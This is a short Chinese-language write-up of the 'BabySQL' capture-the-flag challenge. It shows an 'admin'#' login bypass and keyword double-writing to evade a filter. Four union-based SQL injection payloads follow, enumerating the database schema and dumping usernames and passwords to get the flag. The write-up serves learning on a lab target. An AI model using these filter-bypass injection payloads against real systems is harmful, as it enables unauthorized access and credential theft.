首页 > 数据库技术 > 详细

[极客大挑战 2019]BabySQL

时间:2021-08-02 23:19:26      阅读:34      评论:0      收藏:0      [点我收藏+]

admin‘#万能密码,给出一段md5没啥鸟用。

试常规注入流程吧,先判断列数。

admin‘ order by 1#

技术分享图片

 

 or被过滤掉了呢,尝试大小写,注释符都无法绕过,双写有了新的报错,说明绕过成功,双写by,绕过成功。

增加到四列,出现报错

技术分享图片

 

 说明列数为3。一顿撸

-1‘ uniunionon selselectect 1,2,database()#

-1‘ uniunionon selselectect 1,(seselectlect group_concat(table_name) frfromom infoorrmation_schema.tables whewherere table_schema=database()),3#

-1‘ uniunionon selselectect 1,(seselectlect group_concat(column_name) frfromom infoorrmation_schema.columns whewherere table_name=‘b4bsql‘),3#

-1‘ uniunionon selselectect 1,(seselectlect group_concat(username,‘~‘,passwoorrd) frofromm b4bsql),3#

最终拿到flag

 

[极客大挑战 2019]BabySQL

原文:https://www.cnblogs.com/akger/p/15091331.html

(0)
(0)
   
举报
评论 一句话评论(0
关于我们 - 联系我们 - 留言反馈 - 联系我们:wmxa8@hotmail.com
© 2014 bubuko.com 版权所有
打开技术之扣,分享程序人生!